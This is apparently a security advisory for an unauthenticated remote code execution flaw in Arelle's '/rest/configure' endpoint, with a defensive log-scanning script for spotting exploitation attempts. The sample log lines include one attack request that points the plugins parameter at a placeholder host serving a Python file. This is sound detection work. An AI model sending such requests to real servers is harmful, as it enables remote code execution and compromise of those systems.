PT-2026-36887 · Arelle · Arelle

Published: 2026-05-04 · Updated: 2026-05-27 · CVE-2026-42796

CVSS v3.1: 9.8 (Critical)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Name of the Vulnerable Software and Affected Versions

Arelle versions prior to 2.39.10

Description

An unauthenticated remote code execution issue exists in the '/rest/configure' REST endpoint. The endpoint accepts a plugins query parameter and forwards it to the plugin manager without requiring authentication or authorization. This allows an attacker to provide a URL to a malicious Python file via the plugins parameter, leading the Arelle webserver to download and execute the attacker-controlled code with the privileges of the Arelle process.

Recommendations

Update to version 2.39.10. As a temporary workaround, restrict access to the '/rest/configure' endpoint to minimize the risk of exploitation.
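
One way to audit web or reverse-proxy access logs for requests to the '/rest/configure' endpoint described above. This is an added example, not Arelle code; the combined log format, the severity labels and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Assumption: common/combined access-log format, e.g. from a reverse proxy.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
SCHEME_RE = re.compile(r'[a-z][a-z0-9+.-]*://', re.I)

def classify(line):
    """Return a finding for a request to /rest/configure, or None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    raw_path, _, query = m.group("target").partition("?")
    # Normalise so percent-encoding, doubled slashes, a trailing slash or
    # mixed case cannot hide the endpoint (deliberately over-inclusive).
    path = re.sub(r"/+", "/", unquote(raw_path)).rstrip("/").lower()
    if path != "/rest/configure":
        return None
    plugins = [v for k, vals in parse_qs(query, keep_blank_values=True).items()
               if k.lower() == "plugins" for v in vals]
    if any(SCHEME_RE.search(v) for v in plugins):
        severity = "high"      # plugins value contains a URL scheme
    elif plugins:
        severity = "medium"    # plugins parameter present, no URL scheme
    else:
        severity = "low"       # endpoint touched, no plugins parameter
    return {"ip": m.group("ip"), "status": int(m.group("status")),
            "severity": severity, "plugins": plugins}

def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]

# Constructed sample lines (documentation IP ranges, placeholder host).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2026:10:00:01 +0000] "GET /rest/configure?plugins=http%3A%2F%2Fhost.invalid%2Fp.py HTTP/1.1" 200 512',
    '198.51.100.4 - - [01/Jan/2026:10:00:05 +0000] "GET /rest//Configure/?PLUGINS=examplePlugin HTTP/1.1" 200 100',
    '192.0.2.10 - - [01/Jan/2026:10:00:09 +0000] "GET /index.html HTTP/1.1" 200 900',
    '192.0.2.11 - - [01/Jan/2026:10:00:12 +0000] "GET /rest/configure HTTP/1.1" 403 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 403 on the last sample line is what a proxy-level restriction of the endpoint would produce; a 200 next to a "high" finding is the case to investigate first.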

Fix

RCE

Missing Authentication

Weakness Enumeration

Related Identifiers

CVE-2026-42796

Affected Products

Arelle